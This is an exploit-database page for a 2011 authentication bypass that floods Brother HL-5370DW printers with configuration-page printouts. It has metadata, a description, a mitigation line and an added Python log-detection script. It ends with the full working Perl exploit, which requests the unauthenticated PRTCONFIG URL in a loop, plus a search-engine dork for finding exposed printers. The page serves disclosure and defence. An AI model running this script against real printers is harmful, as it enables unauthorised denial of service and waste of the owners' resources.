vendor: HL-5370DW series
by: chrisB
CVSS: 7.5 HIGH
Authentication Bypass
CWE: 287
Product Name: HL-5370DW series
Affected Version From: Brother HL-5370DW series
Affected Version To: Brother HL-5370DW series
Patch Exists: NO
Related CWE: N/A
CPE: h:brother:hl-5370dw_series
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

Brother HL-5370DW series auth bypass printer flooder

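This exploit allows an attacker to bypass authentication and flood a Brother HL-5370DW series printer with pages. The script replaces main.html in the printer's web interface URL with post/panel.html?EXECUTE2=PRTCONFIG and requests that URL repeatedly without supplying credentials; each response containing "acknowledged" is counted as a printed page.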

Mitigation:

Ensure that authentication is enabled on the printer and that only authorized users are allowed to access it.
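
Added example (not part of the original advisory or of the Exploit-DB script): detection logic that scans HTTP access-log lines for the post/panel.html?EXECUTE2=PRTCONFIG request used by the script on this page and flags sources that repeat it in a short burst. The Common Log Format input, the threshold and window values, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Request the script on this page sends (path and query taken from the page).
TRIGGER = re.compile(r"/post/panel\.html\?(?:\S*&)?EXECUTE2=PRTCONFIG(?:&|$)", re.I)
# Assumed input format: Common Log Format lines from a proxy in front of the printer.
CLF = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+)')

def find_floods(lines, threshold=3, window=timedelta(seconds=60)):
    """Map each source that sent >= threshold trigger requests inside one
    sliding window to its total number of trigger requests."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if m and TRIGGER.search(m["url"]):
            hits[m["src"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    alerts = {}
    for src, times in hits.items():
        times.sort()
        start = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window:  # shrink the window from the left
                start += 1
            if end - start + 1 >= threshold:
                alerts[src] = len(times)
                break
    return alerts

def _line(src, hhmmss, url):
    return f'{src} - - [31/May/2011:{hhmmss} +0000] "GET {url} HTTP/1.1" 200 312'

PRT = "/printer/post/panel.html?EXECUTE2=PRTCONFIG"
SAMPLE = [  # constructed log lines, not real traffic
    _line("192.0.2.10", "10:00:01", "/printer/main.html"),
    _line("192.0.2.10", "10:00:02", PRT),
    _line("192.0.2.10", "10:00:03", PRT),
    _line("192.0.2.10", "10:00:04", PRT),
    _line("192.0.2.10", "10:00:05", PRT),
    _line("192.0.2.77", "10:05:00", PRT),  # single config page: not flagged
    _line("192.0.2.88", "09:00:00", PRT),  # three requests spread over hours
    _line("192.0.2.88", "11:00:00", PRT),
    _line("192.0.2.88", "13:00:00", PRT),
]

if __name__ == "__main__":
    for src, n in find_floods(SAMPLE).items():
        print(f"ALERT {src}: {n} PRTCONFIG print requests, burst detected")
```
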

Exploit-DB raw data:

# Exploit Title: Brother HL-5370DW series auth bypass printer flooder
# Google Dork: Copyright(C) 2000-2009 Brother Industries, Ltd. All Rights Reserved. Brother HL-5370DW series
# Date: 31/05/2011
# Author: chrisB
# Contact : chrisb [@) gmx.fr
# Version: Brother HL-5370DW series

#!/usr/bin/perl
use LWP::Simple;

usage() unless $ARGV[1];

$replace = 'post/panel.html?EXECUTE2=PRTCONFIG';
$hint = $ARGV[1];
$goodurl = $ARGV[0];
$success = 0;
$goodurl =~ s/main.html/$replace/; 

for ($count = $hint + 1; $count >= 1; $count--) {
    $contents = get($goodurl);

    if ($contents =~ m/acknowledged/i)
    {
        $success++;
        print "success\n";
    }
    else
    {
        print "error, busy or no more paper\n";
    }
}
print "pages printed : $success \r\n";

sub usage 
{
 print qq( Brother HL-5370DW series auth bypass printer flooder
       
Usage: perl $0 [http://url.fr/printer/main.html] [hints]
                  
)   and exit;
}